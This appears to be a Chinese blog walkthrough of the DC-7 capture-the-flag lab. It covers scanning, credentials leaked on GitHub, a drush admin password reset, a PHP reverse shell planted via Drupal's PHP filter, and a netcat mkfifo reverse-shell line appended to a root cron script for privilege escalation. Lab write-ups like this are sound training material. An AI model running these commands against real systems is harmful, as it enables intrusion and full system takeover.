0
点赞
收藏
分享

微信扫一扫

DC系列(7)DC-7渗透测试

梦想家们 2022-01-12 阅读 88
安全linux

DC-7

0x00 前期准备

  1. 官方提示:跟以前一个DC类似,但有新的概念包含其中,如果选择暴力破解和词典攻击,将不会成功。跳出框框思考。
    在这里插入图片描述

  2. 导入成功。
    在这里插入图片描述

0x01

  1. nmap扫描:nmap 172.20.10.0/24,得到dc7地址172.20.10.6,开放80、22端口。
    在这里插入图片描述

  2. 访问网页,是Drupal网页,依然提示跳出盒子思考。

在这里插入图片描述
3. 左下角找到一个推特账户@DC7USER,科学地找到该用户主页,看到github连接,点进进入,看到有一个staffdb文件夹。
在这里插入图片描述

  1. 点进staffdb查看,在config.php中找到可疑用户名dc7user和密码MdR3xOgB7#dW。
    在这里插入图片描述

  2. 以防万一,下载压缩包并放入kali解压。
    在这里插入图片描述

  3. 直接在网页登陆无效,尝试使用密码MdR3xOgB7#dW进行ssh登陆:ssh dc7user@172.20.10.6。成功。
    在这里插入图片描述

  4. ls查看,发现提示接收到新邮件。cat查看该目录,发现敏感字眼:root和backup.sh脚本。
    在这里插入图片描述

  5. 按照提示路径查看/opt/scripts/backups.sh,与drush和gpg指令相关。
    在这里插入图片描述

  6. drush是一个shell接口,用于从云服务器命令行管理Drupal。进入/var/www/html,执行:drush user-password admin --password="admin",修改admin用户密码为admin。

    在这里插入图片描述

  7. 修改成功后,回到网页用admin-admin登陆。
    在这里插入图片描述

  8. 因为dc7的CMS是Drupal8,已经移除了PHP Filter,后续作为一个模组存在,可以手动安装。点击

    在这里插入图片描述

  9. 进入http://drupal.org/project/php,下载压缩包php-8.x-1.1.tar.gz并存入kali。
    在这里插入图片描述

  10. 回到kali网页,依次点击左上角的manager→extend→install new module,浏览选择刚才的压缩包。
    在这里插入图片描述

  11. install安装成功,点击next steps里的enable newly added modules激活php模块。
    在这里插入图片描述

  12. 点击蓝色三角收回前几栏,找到Filters-php filter,勾选后到页末选择
    在这里插入图片描述

  13. 安装成功。
    在这里插入图片描述

  14. 在Content中添加一句话木马,依次点击:content→add content→basic page,测试添加<?php phpinfo(); ?>,命名为info test。选择format为php code。
    在这里插入图片描述

  15. 回显php信息成功。
    在这里插入图片描述

  16. 写入之前提到的php-reverse-shell.php,修改ip和port。

    在这里插入图片描述

  17. 在kali开启监听端口:nc -lvvp 7788,点击save,此时在终端反弹shell成功,切换shell外壳:python -c 'import pty;pty.spawn("/bin/bash")'
    在这里插入图片描述

  18. 回看之前ssh登录时找到的bash脚本权限:ls -l backups.sh。该脚本属于root和www-data用户组。
    在这里插入图片描述

  19. 在kali终端用msfvenom生成后门,对应端口8888:msfvenom -p cmd/unix/reverse_netcat lhost=172.20.10.3 lport=8888 R

    在这里插入图片描述

  20. 复制在dc7终端的backups.sh写入后门:echo "mkfifo /tmp/eieioac; nc 172.20.10.3 8888 0</tmp/eieioac | /bin/sh >/tmp/eieioac 2>&1; rm /tmp/eieioac" >>backups.sh
    在这里插入图片描述

  21. 在kali开启监听8888端口:nc -lvvp 8888,耐心等待backups.sh这个定时任务执行(真的要等一会),反弹shell成功,查询用户为root。
    在这里插入图片描述

  22. 连续执行指令,进入/root目录找到theflag.txt,渗透成功。
    在这里插入图片描述

举报

相关推荐

0 条评论